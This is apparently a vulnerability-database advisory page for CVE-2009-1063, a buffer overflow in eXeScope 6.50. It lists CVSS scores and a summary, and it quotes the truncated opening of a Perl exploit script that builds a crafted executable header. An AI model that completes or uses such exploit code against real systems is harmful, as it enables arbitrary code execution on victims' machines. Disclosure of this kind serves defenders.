6.8
CVSSv2

CVE-2009-1063

Published: 26/03/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in eXeScope 6.50 allows user-assisted remote malicious users to execute arbitrary code via a crafted executable (.exe) file.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

brother soft exescope 6

Exploits

#!/usr/bin/perl # # eXeScope 650 Local Buffer Overflow Exploit # # Download eXeScope 650 at: # hpvectorcojp/authors/VA003525/eXeSc650zip # # Exploit by: Koshi ( heykoshi@gmailcom ) # use strict; use warnings; my $headers = "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00" "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x ...